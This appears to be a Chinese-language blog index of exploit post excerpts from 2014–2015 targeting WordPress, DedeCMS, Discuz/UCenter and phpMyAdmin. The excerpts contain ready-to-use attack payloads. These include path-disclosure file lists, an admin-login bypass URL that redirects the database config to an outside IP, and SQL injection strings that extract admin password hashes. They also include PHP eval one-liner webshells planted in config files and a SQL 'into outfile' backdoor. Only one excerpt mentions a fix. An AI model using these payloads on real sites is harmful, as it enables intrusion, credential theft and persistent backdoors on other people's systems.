• 一、漏洞类型:网站可以爆绝对路径。下面列出一小部分漏洞文件: /wp-settings.php /wp-admin/admin-functions.php /wp-admin/menu-header.php /wp-admin/menu.php /wp-admin/options-head.php /wp-admin/upgrade-functions.php /wp-admin/includes/admin.php /wp-includes/admin-bar.php /wp-includes/author-template.php /wp-includes/category-template.php ...
    作者:熊猫| 发布:2015年1月11日| 阅读:1,967次| 分类:PHP, 代码审计, 漏洞列表, 编程语言| 标签:
  • 方法一、 进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php 方法二、 后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,...
    作者:熊猫| 发布:2014年2月26日| 阅读:4,675次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 把以下代码中的:validate=dcug 改为当前的验证码,即可直接进入网站后台,此漏洞的前提是必须得到后台路径才能实现。 http://www.123.com/织梦网站后台/login.php?dopost=login &validate=dcug&userid=admin&pwd=inimda &_POST[GLOBALS][cfg_dbhost]=116.255.183.90 &_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0 &_POST[...
    作者:熊猫| 发布:2014年2月21日| 阅读:2,907次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • member/reg_new.php POST dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA &mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r &uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss &email=sss%40ss.ss&safequestion=0&safeanswer= &sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `dede...
    作者:熊猫| 发布:2014年2月21日| 阅读:2,255次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 首先用暴路径漏洞找到绝对路径,然后替换下面的路径 随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell) Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'D:\www\dmtz\bbs\upload\phpmyadmin\eval.php'; Drop TABLE IF EXISTS a; 这是我们的后门 http://xxx.com/ph...
    作者:熊猫| 发布:2014年2月21日| 阅读:3,193次| 分类:PHP, 漏洞列表, 编程语言| 标签:, ,
  • 首先你应该得到管理员的用户名和密码,若密码最好不过了,如果实在找不到找好去找一下老密。密码都得到了以后,进入后台,直接在UCenter IP 地址(站长--ucenter设置): 里面插入一句话  xxoo\\');eval($_POST[a])?>;// 就ok 然后菜刀连接http://www.xxoo.com/config/config_ucenter.php 密码a。 现在这个漏洞应该大部分的网站都不存在了。
    作者:熊猫| 发布:2014年2月21日| 阅读:2,460次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 上传地址:http://bbs.myoppo.com/bluesword/blue_sword.php?t=t_upload&Action=PostMsg 已使用解析拿下shell。 大马:<?fputs(fopen("x.php","w"),"<?eval(\$_POST[g]);?>")?> 只要把大马和一张图片合成后,上传,直接在后面加入1.php 自动生成x.php的木马。 修复方案: 1、设置php.ini的cgi.fix_pathinfo为0,重启php。最方便,但修改设置的影响需要自己评...
    作者:熊猫| 发布:2014年2月21日| 阅读:2,281次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 后台拿shell 需要有管理员帐号及密码,进入后台打开站长----ucenter设置,直接在UCenter IP 地址:里面插入一句话 xxoo\\');eval($_POST[a])?>;// 就ok ,然后菜刀连接 http://XXX.com/config/config_ucenter.php 密码a 爆路径文件如下: /uc_server/control/admin/db.php/source/plugin/myrepeats/ table/table_myrepeats.php/install/include/install_lang.php
    作者:熊猫| 发布:2014年1月22日| 阅读:5,252次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.killsec.com/de/member/pm.php?dopost=read&id=1 %27%20and%20@%60%27%60%20and%20 %28SELECT%201%20FROM%20%28select %20count%28*%29,concat%28floor%28rand %280%29*2%29,%28substring%28%28Select%20%28 version%28%29%29%29,1,62%29%29%29a %20from%20i...
    作者:熊猫| 发布:2014年1月21日| 阅读:1,712次| 分类:PHP, 漏洞列表, 编程语言| 标签:
  • 解密:织梦密码是cmd5加密,为20位,去掉前三位与后一位。 后台:默认的是dede/login.php 1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台. 2.include/dialog/config.php会爆出后台管理路径 3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录 4.include...
    作者:熊猫| 发布:2014年1月21日| 阅读:2,065次| 分类:PHP, 漏洞列表, 编程语言| 标签:, ,